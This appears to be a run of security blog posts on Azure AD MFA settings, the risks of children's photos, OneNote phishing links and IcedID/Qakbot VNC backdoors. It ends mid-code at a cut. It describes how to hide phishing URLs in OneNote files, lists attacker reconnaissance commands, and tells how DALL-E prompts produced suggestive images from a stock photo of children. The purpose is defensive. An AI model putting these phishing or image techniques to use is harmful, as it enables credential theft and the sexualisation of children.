Security Defaults

The first capability is the Azure AD Security Defaults. The Security Defaults are a great first step to improve the security posture by enforcing specific access controls:

  • Unified Multi-Factor Authentication (MFA) registration: All users in the tenant must register for MFA. With Security Defaults, users can only register for Azure AD Multi-Factor Authentication by using the Microsoft Authenticator app with push notifications. Note that once registered, users will have the possibility to use a verification code (Global Administrators will also have the possibility to register a phone call or SMS as second factor). Another important note is that disabling MFA methods may lead to locking users out of the tenant, including the administrator that configured the setting, if Security Defaults are being used;
  • Protection of administrators: Because users that have privileged access have increased access to an environment, users that have been assigned to specific administrator roles are required to perform MFA each time they sign in;
  • Protection of users: All users in the tenant are required to perform MFA whenever necessary. This is decided by Azure AD based on different factors such as location, device, and role. Note that this does not apply to the Azure AD Connect synchronization account in case of a hybrid deployment;
  • Block the use of Legacy Authentication Protocols: Legacy authentication protocols refer to protocols that do not support Multi-Factor Authentication. Therefore, even if a policy is configured to require MFA, users will be allowed to bypass MFA if such protocols are used. In Microsoft 365, legacy authentication comes from clients that don’t use modern authentication, such as Office versions prior to Office 2013, and mail protocols such as IMAP, SMTP, or POP3;
  • Protection of privileged actions: Users that access the Azure Portal, Azure PowerShell or Azure CLI must complete MFA.

These features already allow us to increase the security posture by enforcing strong authentication. Therefore, they can be considered a first step for our organization, which has just started to use Microsoft 365 and is still researching and evaluating the different possibilities.

If we want to enable Security Defaults, we go to the Azure Portal > Azure Active Directory > Properties > Manage Security Defaults:

Enable Security Defaults in Azure AD
Enabling Security Defaults

However, there are important deployment considerations to be respected before enabling Security Defaults. Indeed, it is a best practice to have emergency accounts. These accounts are usually assigned the Global Administrator role, the most privileged role in Azure AD/Microsoft 365 and are created to enable access to the environment when normal administrator accounts can’t be used. This could be the case if Azure AD MFA experiences outages. Because of the purpose of such accounts, these users should either be protected with a very strong first authentication method (e.g., strong password stored in secure location such as a physical vault that can only be accessed by a limited set of people under specific circumstances) or use a different second authentication factor than other administrators (e.g., if Azure AD MFA is used for administrator accounts used regularly, a third party MFA provider, such as hardware tokens, can be used). But here is the problem: this is not possible when using Security Defaults.

Per-user MFA settings

Note that the per-user MFA settings, also known as legacy multifactor authentication, will be deprecated on September 30th, 2024.

The second capability included with an Azure AD free license is the per-user MFA settings. These settings can be used to require Multi-Factor Authentication for specific users each time they sign in. However, some exceptions are possible by turning on the ‘Remember MFA on trusted devices’ setting. Note that, when enabled, this setting allows users to mark their own personal or shared devices as trusted, because it does not rely on any device management solution. Users who select this option will only be asked to reauthenticate every few days or weeks, depending on the configuration.

We usually do not recommend using the ‘Remember MFA on trusted devices’ setting unless you do not want to use Security Defaults and do not have Azure AD Premium licenses. Indeed, this setting allows any user to trust any device, including shared and personal devices, for the specified number of days (between one and 365 days). These settings can be configured in the https://account.activedirectory.windowsazure.com portal.

In the user settings, MFA can be enabled for each individual user.

Per-user MFA settings in Azure AD
Per-user MFA users settings

Then, in the service settings, we can allow users to create app passwords for legacy applications that do not support MFA, select the authentication methods available to all users, and decide whether users may remember Multi-Factor Authentication on trusted devices for a given period of time. Note that the trusted IP addresses feature requires an additional license (Azure AD Premium P1) that we do not have for the moment.

Legacy MFA settings in Azure AD
Per-user MFA service settings

Sum-up

These two features are quite different but allow us to achieve the same goal, to enforce strong authentication, i.e., MFA, for all or some users.

For our organization we will choose the Security Defaults for multiple reasons:

  • The per-user MFA settings can quickly become unmanageable. This is especially true for a growing organization. With more people and a more complex environment, exceptions will be required, and it will become difficult to keep track of the configuration and maintain a good baseline. Security Defaults, on the other hand, enforce a standard baseline for all users;
  • With per-user MFA, users will be prompted for MFA every time they sign in. This degrades the user experience and may impact productivity;
  • Security Defaults block legacy authentication protocols that might otherwise be used to bypass MFA. This reduces the exposure of identities, including administrators, to brute-force and password-spraying attacks and helps mitigate the risk of successful phishing attacks to a certain extent;
  • Multi-Factor Authentication registration is enforced with Security Defaults for all users, meaning that all users will be able to perform MFA when required.

By going that way, we need to consider that exclusions are not possible. Therefore, emergency accounts or user accounts used as service accounts (which are not recommended as they are inherently less secure than managed identities or service principals) might be blocked. Nevertheless, as we are just evaluating the Microsoft 365 products, we can accept that the environment and cloud applications could be unavailable for a few hours without any major impact on business processes. However, this might become a crucial point in the future.

Finally, it is important to note that these two features do not allow to configure more granular controls as we will see later in this series.

Conclusion

In this first blog post, we have seen different possibilities to enforce access restrictions that can be implemented when an organization just starts its journey in Microsoft 365:

  • Per-user MFA settings: Allow enforcing MFA for specific users but can quickly become unmanageable and do not provide granular controls;
  • Security Defaults: Allow enforcing a strong authentication mechanism and blocking legacy authentication protocols that may allow users to bypass MFA. This solution is recommended over the per-user MFA settings. However, note that regular users are only prompted for MFA when Azure AD deems it necessary, which is not ideal.

In brief, we can see that both solutions have limitations and will not be suitable for most organizations. Indeed, there are still many aspects, such as restricting access based on specific conditions, that are not covered by these capabilities. We will go over additional key features as well as our recommendations for the implementation of a Zero Trust approach in Microsoft 365 in future blog posts.

In the next blog post, we will see how we can protect our environment against external users and applications.

About the author

Guillaume Bossiroy

Guillaume is a Senior Security Consultant in the Cloud Security Team. His main focus is on Microsoft Azure and Microsoft 365 security where he has gained extensive knowledge during many engagements, from designing and implementing Azure AD Conditional Access policies to deploying Microsoft 365 Defender security products.

Additionally, Guillaume is also interested into DevSecOps and has obtained the GIAC Cloud Security Automation (GCSA) certification.

An Innocent Picture? How the rise of AI makes it easier to abuse photos online.

4 April 2023 at 08:15

Introduction

The topic of this blog post is not directly related to red teaming (which is my usual go-to), but something I find important personally. Last month, I gave an info session at a local elementary school to highlight the risks of public sharing of children’s pictures at school. They decided that instead of their photos being publicly accessible, changes would be implemented to restrict access to a subset of people. However, there are many more instances of excessive sharing of information online; photographers’ portfolios, youth/sports clubs, sharenting on social media, etc.

There are many risks stemming from this type of information being openly available, and the potential risks have only increased with the rise of artificial intelligence. Since you are reading this post on the NVISO blog, I’m assuming you are more cyber-aware than the average person out there and therefore perfectly positioned to use the takeaways from this post and spread the word to others. Obligatory Simpsons reference:

Since the children themselves may not have a say in the matter yet and the people who do may not be aware of the possible dangers, it’s up to us to think of the children!

Traditional Risks

When thinking of the risks linked to the presence of children’s pictures online, an obvious threat is the type of person that might drive a van like this:

There are three traditional risks we will be discussing here:

  • Kidnapping
  • Digital Kidnapping
  • Pornographic Collections

Kidnapping

How does a picture of a child pose a risk for physical kidnapping? First of all, a picture could give away a physical location, for example due to the presence of street signs/names, recognizable elements such as shops, bars, monuments, schools, etc. If this is a location frequented by the child, a possible child predator could identify an opportunity for kidnapping there.

In case no identifiable elements are present, certain people might still give away the location due to oversharing. Imagine a picture on a Facebook profile that is publicly accessible with comments such as “birthday party at …”, “visiting grandma & grandpa in …”, “always a fun day when we go to …”. Often-visited locations can be deduced from comments like these.

Finally, a more technical approach is looking at the picture’s metadata, which often gives information about the type of camera that was used, shutter time, lens, etc. but can also contain an exact location where the picture was taken. No additional research is required to figure out where the child has been.
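
To illustrate how little effort this takes, the sketch below uses recent versions of the Pillow library to read camera details and GPS coordinates from a picture's EXIF data (the file name holiday_photo.jpg is a hypothetical example):

from PIL import Image, ExifTags

# Assumption: a local picture named "holiday_photo.jpg"; requires the Pillow library
img = Image.open("holiday_photo.jpg")
exif = img.getexif()

# Translate numeric tag IDs into readable names such as Make, Model or DateTime
readable = {ExifTags.TAGS.get(tag_id, tag_id): value for tag_id, value in exif.items()}
print({key: readable[key] for key in ("Make", "Model", "DateTime") if key in readable})

# GPS coordinates live in their own IFD (0x8825); this is where the exact location leaks
gps_ifd = exif.get_ifd(0x8825)
gps = {ExifTags.GPSTAGS.get(tag_id, tag_id): value for tag_id, value in gps_ifd.items()}
print(gps.get("GPSLatitude"), gps.get("GPSLatitudeRef"), gps.get("GPSLongitude"), gps.get("GPSLongitudeRef"))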

Digital Kidnapping

With digital kidnapping, the victim is affected by some type of identity fraud. Pictures of the child are stolen and reused by people online on their own social media, often pretending to be related to the children. An example could be an adoption fantasy, reposting pictures of the child for likes and comments without the child or its parents knowing about this.

Another, more dangerous form of digital kidnapping consists of a sexual predator reusing the victim’s pictures to target other possible victims. Someone could pretend to be a young child themselves to lure other children into meeting with them online or sharing potentially explicit pictures.

Pornographic Collections

Continuing on the topic of potentially explicit pictures, it is not a secret that the Dark Web is full of pornographic pictures of children. However, pictures that you or I would not consider to be risky or explicit could end up in such collections as well. Holiday pictures of children in swimsuits are happily shared by child predators in an attempt to fulfill their fantasies. They search through social media to identify such pictures, sharing them among each other along with sexual fantasies. With pictures of a certain child, they might search for pictures of lookalike children to add to their fantasy. With only a textual story, they might search for pictures of children that match the story.

However, these risks have existed for a number of years already. What is more dangerous is that the rise of artificial intelligence has made the life of a child predator looking for pictures considerably easier.

Next-gen Risks

So what is the problem with public pictures? Not only can they be retrieved by anyone browsing the web, but they can and will also be gathered by automated systems through concepts called spidering and scraping. These activities aren’t particularly nefarious and are actually part of the regular functioning of the web, used by search engines for example. However, other applications can make use of these same techniques and have already done so to create massive collections of pictures, even those you would not expect to be public, such as medical records.

Facial Recognition

One such example is ClearView AI, which is aimed at law enforcement, applying its facial recognition algorithm to a huge collection of facial images to help with investigative leads. However, a similar application has become available to the broader public, allowing anyone to upload a picture and receive an overview of other pictures with matching faces. While it probably has legitimate use cases, PimEyes provides people with less honorable intentions an easy way to add a high-tech touch to the traditional risks mentioned above. If you haven’t heard about PimEyes yet, it allows you to upload a picture of someone’s face, after which the application will provide you with a collection of matching pictures. The tool is already quite controversial, as evidenced by the articles below:

As an example, we provided PimEyes with the face of the middle child selected from the stock photo on the left below, which resulted in a set of pictures containing the same child:

Of course, the algorithm identifies the pictures that are part of the same set of stock pictures. When trying this out with a private picture of someone, the set of results contained distinct public pictures with the same person. The algorithm was able to identify them in pictures of low quality or with the person wearing a hat or mouth mask covering a large part of the face. Scary stuff, especially considering what you could be able to do with this output:

  • Imagine a picture of a child without any hints towards the location (e.g. stolen from Facebook or other social media). Upload it to PimEyes and you might be able to link the child’s face to other public pictures where a location can easily be deduced (such as a school website for example). You now know locations where the child may frequently be present.
  • Remember in one of the previous paragraphs where we said “With pictures of a certain child, they might search for pictures of lookalike children to add to their fantasy.” Well, this type of technology automates the task.
  • Resources above mention a woman having found sexually explicit content through facial recognition. Imagine your child falling victim to revenge porn in the future and having those pictures exposed. Through PimEyes it may even be possible that such pictures are shown in the results together with pictures of when the victim was still a child.

Of course, in addition to these “extreme cases”, in the future it may very well be that possible employers don’t just google your name, but also search your face before an interview. The results may consist of shameful pictures you would rather not have an employer see. There could be a psychological effect as well; maybe in the past you were struggling with certain physical conditions (e.g. being overweight) or affected by other conditions which are no longer relevant at the time when someone tries to find your older pictures. Being confronted with that type of past content may be a painful experience.

Generation of previously non-existent content

We’ve all been playing around and having a lot of fun with ChatGPT, DALL-E, and other AI models. While it is possible to generate a picture from a textual prompt, it is also possible to take an existing image and swap out parts of it based on a textual prompt. What could possibly go wrong? OpenAI does mention the following protections having been put in place: “… we filtered out violent and sexual images from DALL·E 2’s training dataset. Without this mitigation, the model would learn to produce graphic or explicit images when prompted for them, and might even return such images unintentionally in response to seemingly innocuous prompts … “ Let’s see what we are able to do with some stock photos.

Starting off from the same stock photo, I erased the bottom part – very amateurishly, I admit – so that it can be completed again by DALL-E:

Using a fairly innocent prompt (“modify the image to portray the children at the beach in swimming gear”), which could however be the type of picture child predators are after, we get the following possible images (note that we have blurred the resulting images):

Alright, these first two images do indeed look like a fun day at the beach, with an inflatable tire, bucket, and what looks like sand. The third image on the other hand, did surprise me a bit. This time, the girls have received shorts and the middle child even has some cleavage generated (adding to our decision of blurring the image). Do note that this is the result with an innocent prompt, specifically mentioning it is about children, and with mitigations against the generation of explicit content built-in by removing sexual images from the training set. Let’s leave it at this for this photo and try to generate something a bit more suggestive starting from this stock picture resulting from “business woman” as a search term. When asking to “turn this into a pin-up model”, starting from just the neck and head, we are able to receive some spicier results:

So this is what we can create from a completely random picture on the internet without having any photo editing skills. Now imagine this result applied to pictures of children and the risks are obvious.

Taking things a step further, other applications may not have the same limitations applied to their training data and are as a result clearly biased towards female nudity. The popular avatar app “Lensa” is known to return nude or semi-nude variations of photos for female users, even when uploading childhood pictures, as evidenced in the following articles:

Taking things another step further, certain apps or services are specifically aimed at the creation of sexually explicit content in the form of deepfakes. Deepfakes are computer-generated images or videos that make use of machine learning to replace the face or voice of someone with that of someone else. Usually this consists of fake pornographic material targeting celebrities. However, deepfake content of adult women personally known to the people wanting to create deepfakes is on the rise, in part due to the ease with which you can create such content or request to have this content created.

However, applying deepfake technology to photo or video content of children is unlikely to remain off-limits for some people, and the report above states that some of the victims of the DeepNude Telegram bot already appear to be under 18.

There is no doubt that artificial intelligence and machine learning are here to stay. With all of their legitimate and highly useful applications, there is inevitably the potential for abuse as well. The only thing we can do as cybersecurity professionals, parents, friends, … is limiting the attack surface as much as possible and trying to make those close to us aware of the dangers.

Tips on reducing the risks

Some general tips we can take into account to protect ourselves and our children include:

  • Determine for yourself and your children what kind of information you are willing to share online and make this desire clear to others. Respect other people’s wishes in this regard. Some people may not like it when you post a picture of them or their children on your social media, even if it is a group picture.
  • Share pictures privately instead of via social media, e.g. mail pictures of the birthday party to a selection of recipients instead of posting online.
  • If you do want to post pictures on your social media, limit the target audience to friends or people you know. As an extension, make sure you only accept connections of people you know.
  • Avoid sharing metadata and limit details, such as location information, that could give away where a picture was taken. Additional guidance on removing metadata is provided by Microsoft here; a minimal example of stripping metadata yourself is shown right after this list.
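
As a minimal illustration of the last tip, the sketch below uses the Pillow library to re-save only the pixel data of a picture, leaving the EXIF metadata behind (file names are hypothetical; dedicated tools and the Microsoft guidance linked above achieve the same result):

from PIL import Image

# Assumption: hypothetical input/output file names; requires the Pillow library
src = Image.open("holiday_photo.jpg")

# Copy only the raw pixels into a brand-new image object, leaving all EXIF metadata
# (camera model, timestamps, GPS coordinates) behind
clean = Image.new(src.mode, src.size)
clean.putdata(list(src.getdata()))
clean.save("holiday_photo_clean.jpg")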

Conclusion

Public pictures can easily be scraped into huge collections that are used for different purposes. While traditional risks (such as sharing on the Dark Web) linked to pictures of children are well-known, emerging technologies such as artificial intelligence and machine learning have opened Pandora’s Box for potential abuse. These collections of gathered pictures can be used for facial recognition or generation of new, possibly explicit content. The resulting dangers may not only manifest now, but perhaps years in the future. As such, it is not only about protecting the child they are today, but also the adult they will become.

About the author

You can find Jonas on LinkedIn

Jonas Bauters

Jonas Bauters is a manager within NVISO, mainly providing cyber resiliency services with a focus on target-driven testing.
As the Belgian ARES (Adversarial Risk Emulation & Simulation) solution lead, his responsibilities include both technical and non-technical tasks. While occasionally still performing pass the hash (T1550.002) and pass the ticket (T1550.003), he also greatly enjoys passing the knowledge.


OneNote Embedded URL Abuse

27 March 2023 at 07:00
OneNote Embedded URL Abuse

In my previous blogpost I described how OneNote is being abused in order to deliver a malicious URL. In response to this attack, helpnetsecurity recently reported that Microsoft is planning to release a fix for the issue in April this year. Currently, it’s still unknown what this fix will look like, but from helpnetsecurity’s post, it seems like Microsoft’s fix will focus on the OneNote embedded file feature.
During my testing, I discovered that there is another way to abuse OneNote to deliver malware: using URLs. The idea is similar to how Threat Actors are already abusing URLs in HTML pages or PDFs, where the user is presented with a fake warning or image to click on, which then opens the URL in their browser and loads a phishing page.

The focus of this blog post will be on URLs within a OneNote file that is delivered as an attachment, not on a URL that leads to OneNote online.

There are 3 ways to deliver URLs via a OneNote file.

  1. Just plainly paste your URL in the OneNote file (Clickable URL)
  2. Make some text (like “Open”) clickable with a malicious URL (Clickable text)
  3. Embed URLs in pictures (Clickable picture)

Now it is important to note that these 3 ways rely on social engineering and tricking the user into clicking your URL or picture, either via instructions or by deceiving the user. We have already seen this technique being used through OneDrive and SharePoint Online.

So, let’s create some examples and see what this attack could look like.

URLs in OneNote

Clickable URLs

The most straightforward way is to just put a URL in a OneNote file. In an actual phishing email, the OneNote file will probably not just contain the URL alone. To make things more believable, Threat Actors could potentially write a small story or an “encrypted” message in the OneNote file (an example of this can be observed below). The idea would then be to convince the user to click the URL in order to “decrypt” the message. Once the URL is clicked, the user would then either have to download something or provide credentials to “log in”.

If you would like to read the message in the OneNote file, you would have to click the URL, which could then lead to the download of a malicious file or a credential harvesting page.
An example of such an “encrypted” message could be:

An example of a fake encrypted message where a user has to click a URL to decrypt it

Clickable text

Similar to clickable URLs, you can hide a URL behind normal text. Once you hover over the URL, you will see where it points. If the address points towards a malicious domain that uses typosquatting (e.g. g00gle[.]com instead of google[.]com), then Threat Actors could fool the human eye.

The text “open” hiding a malicious URL


The issue here lies in the fact that once you click the “open” text, you will immediately be redirected to the website. There is no pop up asking if you really want to visit the website.
Taking this technique into account, it is also possible to use our “encrypted message” example from before and make the user think they will visit a legitimate page but embed a different URL:

The visible URL “https://microsoft.com” is hiding a malicious URL

Clickable Pictures

To create an embedded URL in a picture, right-click your picture, and Click “Link…”


Here you can put a URL to your malicious file or phishing page. You could, for example, spin the story so that the user has to “authenticate” or log in again, leading them to a fake login website.
Do note that to open a URL that is embedded within a picture, you will need to hold the CTRL key and click the image. The phishing document will have to instruct the user to hold CTRL and click the picture; however, I do not see this as an obstacle for threat actors.

A picture with the button “open” that has an embedded malicious URL

Detection Capabilities

On OneNote Interaction

Opening the URL will launch the default browser. This translates to OneNote spawning a child process, which is the browser. A full process flow could look something like this:

Process execution of explorer.exe > Outlook.exe > OneNote.exe > firefox.exe


Do note that, as is typical for Outlook, once you click the attachment, a copy is saved in a temporary cache folder (depending on your version of Outlook, this can be a slightly different location than shown above, but generally the folder path will contain INetCache and Content.Outlook).

A quick hunting rule for this behaviour can be to look for the process tree that was observed before. This process tree can be adjusted to the needs of your environment, depending on what browser is being used (e.g. if you are running brave.exe, you should include this in the “FileName” section of the query)

DeviceProcessEvents
| where InitiatingProcessFileName contains "onenote.exe"
| where FileName has_any ("firefox.exe","msedge.exe","chrome.exe")

Now if you’d like a more “catch all” approach, the last line can be replaced with one that looks at the command line for http or other protocols like ftp, as both Chromium- and Firefox-based browsers accept URLs as a command-line argument to open a specific website.

| where ProcessCommandLine has_any ("http","ftp")

On Email Delivery

During our tests, Microsoft Defender was unable to detect or extract the URLs that were embedded in the OneNote file, as can be observed in the screenshot below: no URLs were extracted, nor was there any indication that a URL was embedded in the file.

No URLs extracted from the OneNote Attachment


This also means that Microsoft does not create a Safe Link for the URL, and thus a threat actor can bypass the “potential malicious URL clicked” alert that helps protect against phishing pages: that alert relies on URL clicks, which cannot be registered if no URLs are detected in the first place.
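
Defenders who want to triage suspicious OneNote attachments themselves do not have to rely on automated URL extraction. As a hedged example, the sketch below simply carves ASCII and UTF-16LE encoded http(s) strings out of a .one file; it does not parse the OneNote file format, so it may miss or over-report URLs, but it is usually enough for a quick look:

import re
import sys

URL_PATTERN = re.compile(rb"https?://[^\s\"'<>]+")

def extract_urls(path):
    """Naively carve http(s) URLs out of a .one file without parsing the OneNote format."""
    with open(path, "rb") as f:
        raw = f.read()
    found = set()
    # ASCII / UTF-8 encoded URLs
    found.update(match.decode(errors="ignore") for match in URL_PATTERN.findall(raw))
    # OneNote stores most text as UTF-16LE, so decode and scan a second time
    utf16 = raw.decode("utf-16-le", errors="ignore").encode("utf-8", errors="ignore")
    found.update(match.decode(errors="ignore") for match in URL_PATTERN.findall(utf16))
    return sorted(found)

if __name__ == "__main__":
    for url in extract_urls(sys.argv[1]):
        print(url)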

Conclusion

Whilst embedded files within OneNote are currently still a big threat, you shouldn’t forget that other OneNote features can be abused for malicious intent as well. As we observed, Microsoft does not extract the URLs from a OneNote file, and there are multiple ways of avoiding detection and tricking the user into clicking a URL. From there, the same tactics are used to deliver second-stage malware, be it via an ISO or ZIP file that contains malicious scripts.

Nicholas Dhaeyer

Nicholas Dhaeyer is a Threat Hunter for NVISO. Nicholas specializes in Threat Hunting, Malware analysis & Industrial Control System (ICS) / Operational Technology (OT) Security. Nicholas has worked in the NVISO SOC solving security incidents for our MDR clients. You can reach out to Nicholas via Twitter or LinkedIn

IcedID & Qakbot’s VNC Backdoors: Dark Cat, Anubis & Keyhole

20 March 2023 at 14:45
IcedIDQakbot

IcedID (a.k.a. BokBot) is a popular Trojan that first emerged in 2017 as an Emotet-delivered payload. Originally described as a banking Trojan, IcedID shifted its focus to embrace the extortion/ransom trend and nowadays acts as an initial access broker, mostly delivered through malspam campaigns. Over the last few years, IcedID has commonly been seen delivering Cobalt Strike prior to a multitude of ransomware strains such as Conti or REvil.

IcedID itself is composed of multiple modules, one of which is a poorly documented VNC (Virtual Network Computing) backdoor acting as a cross-platform remote desktop solution. The existence of this module (branded “HDESK” or “HDESK bot”) is only partially covered by Malwarebytes (2017) and Kaspersky (2021), while its usage has been widely observed and is occasionally popularized as “Dark VNC”.

As part of our research efforts, NVISO has been analyzing IcedID and Qakbot’s command & control communications. In this blog-post we will share insights into IcedID and Qakbot’s VNC backdoor(s) as seen from an attacker’s perspective, insights we obtained by extracting and reassembling VNC (RFC6143) traffic embedded within private and public captures published by Brad Duncan.

In this post we introduce the three variants we observed as well as their capabilities: Dark Cat, Anubis and Keyhole. We’ll follow by exposing common techniques employed by the operators before revealing information they leaked through their clipboard data.

Bokbot or Qakbot?

This research was originally titled “IcedID’s VNC Backdoors: Dark Cat, Anubis & Keyhole” and focused solely on IcedID (Bokbot). Brad however correctly pointed-out that Dark Cat is only leveraged by Qakbot, samples which were mistakenly included in this research after being confused with Bokbot (IcedID).

IcedID and Qakbot VNC traffic remains extremely similar as can be observed in the following three VNC backdoors.

HDESK Variants

During our analysis of both public and private IcedID and Qakbot network captures, we identified 3 VNC backdoor variants, all part of the HDESK strain. These backdoors are typically activated during the final initial-access stages to initiate hands-on-keyboard activity. Supposedly short for “Hidden Desktop”, HDESK leverages Windows features allowing the backdoor to create a hidden desktop environment not visible to the compromised user. Within this hidden environment, the threat actors can start leveraging the user interface to perform regular tasks such as web browsing, reading mails in Outlook or executing commands through the Command Prompt and PowerShell.

We believe with medium confidence that these backdoors share origins, as the Dark Cat interface (used by Qakbot) has traits that can later be found within the Anubis and Keyhole interfaces (used by IcedID).

Dark Cat VNC

The “Dark Cat VNC” variant was first observed in November 2021 and is believed to be the named releases v1.1.2 and v1.1.3 used by Qakbot. Its usage was still extensively observed by the end of 2022. Upon initial access, the home screen presents the operator with multiple options to create new sessions alongside backdoor metrics such as idle time or lock state.

Figure 1: The Dark Cat VNC interface.

User Session

Figure 2: A Dark Cat USER session.

The USER session exists in three variations (read, standard and black) which allows the operator to switch the VNC view to the user’s visible desktop.

HDESK Session

The HDESK session exists in three variations as well: standard, Tmp and NM (also called bot). This session type causes the backdoor to create a new hidden desktop not visible to the compromised user.

Based on the activity we observed, the HDESK sessions are (understandably) preferred by the operators.

Figure 3: A Dark Cat HDESK session.

As HDESK sessions by default do not benefit from Windows’ built-in UI, operators are presented with an alternative start-menu to launch common programs. In Dark Cat these are Chrome, Firefox, Internet Explorer, Outlook, Command Prompt, Run and the Task Manager. A Windows Shell button is also available which, we believe, if used, will spawn the regular Windows UI most users are used to. Starting with Dark Cat v1.1.3, Edge Chromium furthermore joins the list of available software.

Figure 4: The Dark Cat HDESK session interface.

Besides the alternate start-menu, operators can access some settings using the top-left orange icon, which include:

  • Defining the hidden windows’ sizes.
  • Defining the Chrome profile to use (lite or not).
  • Deleting the browser’s profile(s).
  • Killing the child process(es).
Figure 5: The Dark Cat HDESK settings interface.

WebCam Session

The WebCam sessions exist in three variations. While we were unable to capture its usage (honeypots lack webcams and operators do not attempt to use this session kind), its presence suggests IcedID’s VNC backdoors are capable of capturing compromised devices’ webcam feeds.

Anubis VNC

The “Anubis VNC” variant was first observed in January 2022 and is believed to be the named release v1.2.0 used by IcedID. Its usage was last observed in Q3 2022. No capability differences were observed between Anubis and Dark Cat v1.1.3.

Figure 6: The Anubis VNC interface.

KEYHOLE VNC

The “KEYHOLE VNC” variant was first observed in October 2022 and is believed to be the named releases v1.3 as well as v2.1. Its usage was observed as recently as Q1 2023.

Grayscale

The first major change observed within Keyhole is its new color palette capability, where operators can pick regular RGB (a.k.a. colored) or Grayscale (a.k.a. black & white) feeds. The actual intent of this feature is unclear as, at least from a network perspective, both RGB and Grayscale consume the same number of bytes per pixel, resulting in equal performance.

Figure 7: The Keyhole color palette selector.

HDESK Sessions

Keyhole v1.3 provides a refreshed start-menu where icons have been updated and options have been renamed; the once cryptic Win Shell option has been rebranded as the My Computer option.

Figure 8: The Keyhole (v1.3) HDESK session interface in gray-scaled color palette.

Later on, with v2.1, Keyhole renamed additional options and introduced the PowerShell and Desktop options. We assess with low confidence that the Desktop option only differs from the My Computer option by also rendering the background, whereas the latter was only seen generating desktop views without a background image.

Figure 9: The Keyhole (v2.1) HDESK session interface.

Modus Operandi

Obtaining recordings of threat actors operating is useful to understand which technical capabilities they are equipped with, but also allows the identification of TTPs (Tactics, Techniques & Procedures) they might employ. In the following section we will review some of the most re-occurring actions we observed IcedID and Qakbot operators perform through the above described backdoors.

🍯 Nothing confidential here…
All media published within this section were reconstructed from publicly published artifacts. As all information is public, we have refrained from redacting otherwise sensitive details such as company names and accounts.

Task Manager

To no surprise, the usage of the Task Manager to identify running software was extremely common. While this activity is hard to detect, as operators did not attempt to interfere with security software, the usage of this graphical utility highlighted one interesting drawback: on multiple (non-published) occasions we observed actors identifying known security tooling based on the process icon, whereas icon-less tooling blended in with many of Windows’ icon-less applications.

Figure 10: An Anubis operator performing interactive reconnaissance through the Task Manager.

Outlook

Another quite common technique was the inspection of Outlook, most likely to identify poorly-populated honeypot networks. As was the case for the Task Manager, the graphical usage of Outlook by the operator is indistinguishable from regular user activity. From the available recordings, no attempts were made to use Outlook for further phishing/spam.

Figure 11: A Dark Cat operator performing interactive reconnaissance through Outlook.
Figure 12: A Dark Cat operator inspecting Outlook's "Rules and Alerts" settings.
Figure 12: A Dark Cat operator inspecting Outlook’s “Rules and Alerts” settings.

On one occasion, we observed the actor expressing interest in Outlook’s rules. The backdoor session was however terminated before they undertook any action, making it unclear whether this was part of the reconnaissance activities or whether they were planning to set up malicious email redirection rules.

Web Browsers

From the available browsers, Edge and Chrome were the favorites. Using these, operators commonly validated the browser’s connectivity by accessing Amazon.

During one intrusion, the operator went as far as attempting to access the compromised user’s Amazon payment information. This attempt is a good reminder that beyond a user’s corporate identity, personal accounts are definitely at risk as well.

Figure 13: A Dark Cat operator accessing Amazon's "Your Payments" account page.
Figure 13: A Dark Cat operator accessing Amazon’s “Your Payments” account page.
Figure 14: A Keyhole operator inspecting Edge's version details.
Figure 14: A Keyhole operator inspecting Edge’s version details.

On some occasions operators accessed the edge://version URL. While this page exposes mostly useless information to attackers, the capture reveals a number of uncommon flags usable for threat hunting.

Noteworthy is the Profile path located within the user’s temporary directory and passed using the --user-data-dir= flag, a pattern that from our available telemetry seems quite uncommon for msedge.exe in enterprise environments. The pattern is however occasionally used for applications such as opera_autoupdate.exe and msedgewebview2.exe.

Also worth noting is the usage of edge://settings/passwords to identify additional accounts.

Figure 14: A Keyhole operator interactively inspecting Edge's stored passwords.
Figure 14: A Keyhole operator interactively inspecting Edge’s stored passwords.
Figure 15: Edge displaying a warning banner due to the usage of an unsupported flag during a Dark Cat session.
Figure 15: Edge displaying a warning banner due to the usage of an unsupported flag during a Dark Cat session.

A final commonly observed pattern is the usage of the unsupported --no-sandbox command-line flag in Edge, resulting in a notification banner. From our available telemetry in enterprise environments, the usage of this flag for Edge is uncommon, as opposed to Electron-based applications (including Microsoft Teams and WhatsApp) which use it extensively.
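
As a rough illustration of how these observations can be turned into a hunt, the sketch below scans an exported CSV of process-creation events for msedge.exe launches carrying the flags discussed above. The column names (DeviceName, FileName, ProcessCommandLine) are assumptions and should be adapted to whatever your EDR or SIEM exports:

import csv
import sys

SUSPICIOUS_FLAGS = ("--no-sandbox", "--user-data-dir=")

# Assumption: a CSV export of process-creation events with hypothetical column names
# DeviceName, FileName and ProcessCommandLine.
with open(sys.argv[1], newline="", encoding="utf-8") as handle:
    for row in csv.DictReader(handle):
        if row.get("FileName", "").lower() != "msedge.exe":
            continue
        command_line = row.get("ProcessCommandLine", "")
        hits = [flag for flag in SUSPICIOUS_FLAGS if flag in command_line]
        if hits:
            print(f"{row.get('DeviceName', '?')}: {hits} -> {command_line}")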

Explorer

Another commonly observed utility to inspect the compromised devices’ files and folders, including payloads dropped through other channels, is Windows Explorer. As was the case with Outlook, Explorer’s usage is indistinguishable from legitimate use, making it a hard-to-detect technique.

Figure 16: A Keyhole operator interactively using Explorer to inspect folders.

Command Prompt

Last but not least, the Command Prompt was, unsurprisingly, used extensively, most commonly for reconnaissance activities, including the usage of:

  • whoami /upn for system user discovery (T1033).
  • ipconfig for system network configuration discovery (T1016).
  • arp -a for both remote system discovery (T1018) and device identification based on the MAC address.
  • dir for file and directory discovery (T1083) over SMB (T1021.002).
  • nltest /dclist for the remote discovery of the domain controllers (T1018).
  • ping for network connectivity tests to remote systems (T1018).
  • PowerShell (T1059.001) to deploy Cobalt Strike.

As opposed to the previous, mostly passive, TTPs, the active usage of the Command Prompt and PowerShell is often where detection rules stand a fighting chance.

Figure 17: An Anubis operator performing initial reconnaissance using the Command Prompt in an HDESK session.

Clipboard Leaks

As VNC acts as a remote desktop solution, another trove of data was found within the clipboard synchronization feature. By copy/pasting between victim and attacker machines, operators exposed some additional TTPs and information surrounding their operations.

In this section we will expose the most common and interesting data found within their clipboards.
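
For context on how such clipboard data can be recovered: in the RFB protocol (RFC 6143), clipboard contents travel in ClientCutText messages, which consist of a one-byte message type (6), three padding bytes, a big-endian length and Latin-1 text. The sketch below is a naive example that scans a reassembled, unencrypted client-to-server TCP stream (for instance exported from Wireshark) for such messages; it does not track full protocol state, so false positives are possible:

import struct
import sys

def extract_clientcuttext(stream: bytes) -> list:
    """Naively scan a raw client-to-server RFB byte stream for ClientCutText (type 6) messages."""
    texts = []
    i = 0
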